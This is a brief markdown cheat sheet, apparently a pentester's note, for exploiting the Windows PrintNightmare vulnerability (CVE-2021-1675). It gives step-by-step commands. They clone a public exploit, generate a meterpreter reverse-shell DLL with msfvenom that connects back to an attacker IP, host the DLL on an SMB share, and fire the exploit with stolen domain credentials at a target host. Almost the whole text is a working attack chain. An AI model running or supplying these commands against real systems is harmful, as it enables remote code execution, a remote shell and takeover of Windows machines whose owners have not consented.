# Print Nightmare * Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git) * Create virtual env inside cloned repo and install impacket ```sh pip install . pip2 install . ``` * Create payload ```sh msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll ``` * Prepare msf multi handler * Inside virtualenv ```sh smbserver share $(pwd) -smb2support ``` * Roll the exploit ```sh python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll' ```